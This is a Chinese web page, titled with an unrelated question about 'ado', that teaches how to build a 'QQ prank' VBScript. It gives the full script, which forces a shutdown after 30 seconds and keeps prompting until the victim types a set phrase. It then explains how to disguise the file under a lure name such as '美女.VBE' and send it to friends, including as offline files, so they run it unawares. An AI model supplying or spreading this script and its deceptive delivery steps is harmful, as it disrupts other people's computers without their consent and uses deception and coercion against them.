ado是什么稳健(ado啥意思)

首先声明这个小程序绝对不是病毒大可放心哈,对好友进行QQ整人的方法。菜鸟也会制作的QQ整蛊小程序。后面附上使用的教程。

第一步,将以下代码复制到记事本中。

on error resume next
dim WSHshellA
set WSHshellA = wscript.createobject("wscript.shell")
WSHshellA.run "cmd.exe /c shutdown -r -t 30 -c ""快说今日头条是好网站,不说就30秒关你机,不信,试试···"" ",0 ,true
dim a
do while(a <> "今日头条是好网站")
a = inputbox ("说今日头条是好网站,就不关机,快撒,说 ""今日头条是好网站"" ","说不说","不说",8000,7000)
msgbox chr(13) + chr(13) + chr(13) + a,0,"MsgBox"
loop

上面的文字可以随便改,不印象效果。如果发给MM,你可以逼她说“我爱你”。方法是把上面的“今日头条是好网站”改成“快说我爱你”


第二步,将记事本文件重命名为 ***.VBE(文件名可以任意起,如“美女.VBE)

如果谁运行了这个QQ整蛊小程序,在30秒后会自动关机。

下面说一下使用方法:

最简单的使用方法是,你直接发给好友,让他运行,然后他就中招了。

还有个更加恶毒的,不在线的QQ好友你可以向他们发送QQ离线文件,几乎80%的人都会好奇这个文件是什么,糊里糊涂就打开了。

打开以后就被QQ整蛊小程序恶搞了

你自己也可以测试一下这个QQ整蛊小程序的威力。